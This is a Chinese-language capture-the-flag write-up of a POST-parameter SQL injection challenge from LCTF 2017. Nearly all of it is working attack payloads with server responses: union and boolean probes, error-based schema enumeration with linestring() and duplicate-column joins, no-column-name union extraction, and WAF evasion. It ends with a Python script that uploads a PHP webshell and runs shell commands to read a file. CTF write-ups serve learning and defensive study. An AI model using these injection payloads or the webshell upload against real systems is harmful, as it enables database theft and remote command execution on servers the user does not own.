SQL注入-POST注入
实践:
http://182.254.246.93/entrance.php
页面显示:
页面源码提示:
看来目标很明确,还是要注入
#post
pro_id=1 and 1=1
#post
pro_id=1 and 1=2
发现存在注入
#post
pro_id=0 union select 1,2,3,4
存在四列,且显示的位置为2
这边使用了version()、database()、user()测试,发现了存在waf
#post
pro_id=0 union select 1,version(),3,4
->得到 5.5.58-0ubuntu0.14.04.1
同理 user()
->得到 biubiubiu@localhost
database()
-> 存在waf,获取失败
#偶然间尝试了一下,(其实是忘记打了逗号)
pro_id=0 union select 1user(),3,4
发现会报错误,并且爆出来数据库名: youcanneverfindme
通过测试发现 database 、 tables 、 columns 、 information 都被ban了
所以不能从information_schema库里得到表名和列名了
#这边使用到的是mysql报错函数: linestring()
#post
pro_id=0 and linestring(pro_id)
->报错信息:Illegal non geometric '`youcanneverfindme17`.`product_2017ctf`.`pro_id`' value found during parsing
意外发现了
数据库:youcanneverfindme17
表:product_2017ctf
一个字段:pro_id
知道库名、表名后,可以利用报错注入得到列名
#post
pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id))c)
-> Duplicate column name 'pro_name'
#得知第二个字段叫做 pro_name
#post
pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id,pro_name))c)
-> Duplicate column name 'owner'
#得知第三个字段叫做 owner
#post
pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id,pro_name,owner))c)
-> Duplicate column name 'd067a0fa9dc61a6e'
#得知第四个字段叫做 d067a0fa9dc61a6e
#post
pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id,pro_name,owner,d067a0fa9dc61a6e))c)
-> Waf is father!
#好吧,爆不下去了,又被waf了!
想到提示是,下一个入口是一个字段加一个表值,那么猜想 d067a0fa9dc61a6e 应该就是那个字段了,现在就是去读取表中的值
#post --奇怪的姿势
#首先 offset 偏移设置 1
pro_id=0 UNION ALL SELECT NULL,CONCAT((select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from product_2017ctf)e limit 1 offset 1 )),NULL,NULL--
-> product name:wobuzaizheli
#post offset 2
-> product name:nextnext
#post offset 3
-> product name:7195ca99696b5a896.php
方法二
#无列名注入
pro_id=-1 union select 1,d,3,4 from (select 1 a,2 b,3 c,4 d union select * from product_2017ctf limit 3,1)xxx
-> product name:7195ca99696b5a896.php
至此,应该知道了下一个入口地址 应该是 d067a0fa9dc61a6e(字段)+7195ca99696b5a896.php(表值)
访问:http://182.254.246.93/d067a0fa9dc61a6e7195ca99696b5a896.php
页面显示:
附上payload
#python 2.7
import requests
import re
url = "http://182.254.246.93/d067a0fa9dc61a6e7195ca99696b5a896.php"
user_agent = "xxx"
t = requests.post(url, headers = {'User-agent': user_agent }, data = {"filename":"zzz.php", "content":"<?=`*`;"}).text
[path] = re.findall('files.*/zzz.php', t)
requests.post(url, headers = {'User-agent': user_agent }, data = {"filename":"bash", "content":'anything'})
#requests.post(url, headers = {'User-agent': user_agent }, data = {"filename":"bash2", "content":'ls /*'})
requests.post(url, headers = {'User-agent': user_agent }, data = {"filename":"bash2", "content":'cat /3*'})
url1 = "http://182.254.246.93/"
r = requests.get(url1+path)
print r.text
得到flag: LCTF{n1ver_stop_nev2r_giveup}
说明:
按顺序POST提交下面3条
filename=p.php&content=<?=`*`;
filename=bash&content=xxx
filename=bash2&content=ls /
再访问p.php,就可以看到
327a6c4304ad5938eaf0efb6cc3e53dc.php
再POST
filename=bash2&content=cat /3*
再去访问p.php,右键查看源代码看到flag–利用参考 http://www.vuln.cn/6016